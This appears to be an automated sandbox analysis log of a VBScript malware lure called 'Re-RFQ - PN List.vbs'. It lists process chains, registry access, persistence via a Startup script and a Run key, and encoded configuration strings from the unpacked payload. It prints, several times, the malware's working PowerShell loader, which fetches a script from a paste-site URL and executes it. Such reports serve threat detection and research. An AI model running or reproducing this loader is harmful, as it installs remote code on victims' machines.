Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_016B94E0 14_2_016B94E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_016B9DB0 14_2_016B9DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_016BDE60 14_2_016BDE60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_016B71D8 14_2_016B71D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_016B9198 14_2_016B9198
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Code function: 14_2_016BFB08 14_2_016BFB08
Source: Re-RFQ - PN List.vbs Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe Section loaded: security.dll Jump to behavior
Source: Re-RFQ - PN List.vbs ReversingLabs: Detection: 12%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\Re-RFQ - PN List.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP"
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SystemLogin.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebRequest] $Request = [System.Net.WebRequest]::Create('https://textbin.net/raw/gia9ab2dg0'); [System.Net.WebResponse] $Response = $Request.GetResponse(); [System.IO.Stream] $Stream = $Response.GetResponseStream(); [System.IO.StreamReader] $Reader = New-Object System.IO.StreamReader $Stream; [String] $FilePath = 'C:\Users\Public\gia9ab2dg0.PS1'; [String] $Command = [System.Text.Encoding]::UTF8.GetString(@(80,111,119,101,114,83,104,101,108,108,32,45,69,120,101,99,117,116,105,111,110,80,111,108,105,99,121,32,82,101,109,111,116,101,83,105,103,110,101,100,32,45,70,105,108,101,32)); [System.IO.File]::WriteAllText($FilePath, $Reader.ReadToEnd(), [System.Text.Encoding]::UTF8); Invoke-Expression ($Command + $FilePath) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\5arm45ue\5arm45ue.cmdline Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC9E1.tmp" "c:\Users\user\AppData\Local\Temp\5arm45ue\CSC76D3F8E3C7D44B4EA91093B17CA01E8C.TMP" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\gia9ab2dg0.PS1 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\lvvchi0q\lvvchi0q.cmdline
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES14F3.tmp" "c:\Users\user\AppData\Local\Temp\lvvchi0q\CSCF59D68E9AEF44B30A0A5857885C9A6E.TMP" Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220516 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0t1u4d1.0tt.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@22/28@3/4
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 14.0.InstallUtil.exe.400000.2.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.0.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.3.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs Security API names: System.Security.Principal.WindowsIdentity System.Security.Principal.WindowsIdentity::GetCurrent()
Source: 17.0.InstallUtil.exe.400000.4.unpack, Client/Helper/Methods.cs Security API names: System.Boolean System.Security.Principal.WindowsPrincipal::IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Settings.cs Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 14.2.InstallUtil.exe.400000.0.unpack, Client/Install/NormalStartup.cs Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Install/NormalStartup.cs Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 14.0.InstallUtil.exe.400000.1.unpack, Client/Settings.cs Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Install/NormalStartup.cs Base64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
Source: 14.0.InstallUtil.exe.400000.4.unpack, Client/Settings.cs Base64 encoded string: 'Zg9VSZv/vsUnEQBzhfXpKPjYm70KkS5MxCRhZ1CLxaONi86O1tioh7cto+j8y2tHB120cTLyZ51HkueXBxsY1A==', 'v23I0uaw1sk1B/UV7MF/i7PWa4pkjHGwD3HGXSar/bDyBGI64sWLOksmjWy56FKsz15Se74UdHLPfujhZYMKxg==', 'zJ/1sVpcObuNfLTrUkZTTh0ZZ7HsCe9LfsAJMBq5glbYy/Bo8lHq+irEJXxzSoyZEMMH32ZAIPgbMMutNwnn5Q==', 'qZK17jl/J4a8Q7oQLlEdW17aFbsly0z2BJF/eEtiuV/2JCpg+zSuK6y7vk86iUp/mO8wdvSbP6wHKhfkIu5t0UiFHk4hrr683x91+Aem184=', 'Uy3qA4XUoTvhzLn2xXYwE8q9FkOCN3aQpvfcYdG/H+f8v+XEnDM0YhpENrKWgLWddtEKdNAxt2VysNAb7olyKY7LrxU/GNx4Pv9cz7nzZNYWKWZYZZ/rkPFJp3wloY9XZl7JY1Y2HMJiZnuyJL+8NMwpoYiWQfTEXVCargNl8n4bBen17eB6rx/GidE5k3pE711DDJr6kz5v3TdgYv3CdBrrSDVbB933SLP83T2TWOGhB3+F7ATHxPYRUCtLUOnot/z8dlwQjW206agkbgvmoL6rSN9YsodPleYlNrUl9rXXigSDa55X70UlTmDwOUo4HmC7/xp0fBQ3jZcJ5XfMVhQjfDJL73S9pUd/fw2pSeHLFoZSewdfvZi96x5sGBro2DGC1XuXt2Mw2QnTuFYumY2EheX8gL0YrlgO4GzqrrTtSvAuCvzoQQiDAvS72FmEAevMW2fmUdEcv3CXsE3eLfYlzxHsQByU8uZYuVD2oC536lcBVBVbZaLwZHGKB+DQrJv3MFfgwGkR05TFDmU5ixHRPd+uV+ZkKaxwHQCZG1svcq/7OaOCsy1HouuH64AQql+f1bTNO+thWbEI7uXSY6tBHbG1NurTlvZD/RnjoIdaE7q0CvrPSeHPekVYDUEO1ijAbCNrXzq2u5t5TE+ZTwyvqtMZWRhy89TOOzKWZXNy9TcHmkOAy+jBe8e+sXGSUO0u5iqhbaw3sRXtamgiamhoqN8hTdOz+vfJDC8A7zCndUdKUfoAQ7B2gIqQ15R7PvpwrZpXL323GesDZDaEtCzqDcydI5UKH8fMZyB+TrHKqFplIkYI9i3HTw7/fvZRdIz33O1eXNx7jreoRxVT99QEx1ChxMlkSni44R7Dn75VsRwW+mxXoX/aJ1X2VPCKWW7NYdVu43pnRZqXqnAbmAe02orAx2fsJJ+a5ya5XKFs+C/FDHeXd81WpwZkXBZFvdS+okigOyS5ZokUz5eMgo35wHhQFzrLAdGxP+J714yIfSvS+rUlOYYXQgdKpTIM9r6/tQoRhRF/iB+WgYBuMrKSfQ5BZRV68Xn2ihArOnI3EUFGnlYynk3RcH95w2LC', 's4eubzQAqwdqZLczo80oYV+6aCOh7nxDIxvmJ9WhBE6RFSxYSwBkQghrXU9kGnOK/REsRpm+BzllXO4eNfUCQPNl8AcQOPWz3R/nZYFUtob6RnDZYK3wTmfYpaQhzHICQQtt6u7KmjUJYTWDIFpsU7UMrEWFJnQJ+l1uS73RR9N6R+FRwmNCVdhewgMCetk+zRXEc1snGJTltcCPW3NU4DNyfSubi8qJkEdL1619D94HVZGAREH1A2LgGBclrTXO1pzILZ/E0DnUewkwr+MNxhMAF44NGHV/7rsdeC5OiXY=', 'zViY6nboISUvBmx5Joto+trVzMpeLLRgMZpFO9m57Mi49ucYpxCH88awKiQaDEcjveaXDJBt0rcy/llBm5rtUg==', 'M72wAaVCyHpUE0p/u2OgzlNEXrDLNJODlaMVbr2TWtwW/kAW5rxYap/mHuiOQvxbAGq9KA1kPWuS051TZkMy9w==', 'Sb7k9N6y/mjln0+cqCNQvo00pCerPyhdvCCZIzPJia3lj82KZYQeECX3k++HZ8gO4e8gjBjgr2+5d1mjRmJUQQ==', '/Fpw2Tycm40na8g2y1lBcAMFaYxWmCKR6KfbuikP8qY4RKVl3XFrj5obCNRk4BcAPfbYgjynREIHRciyq+PR3w=='
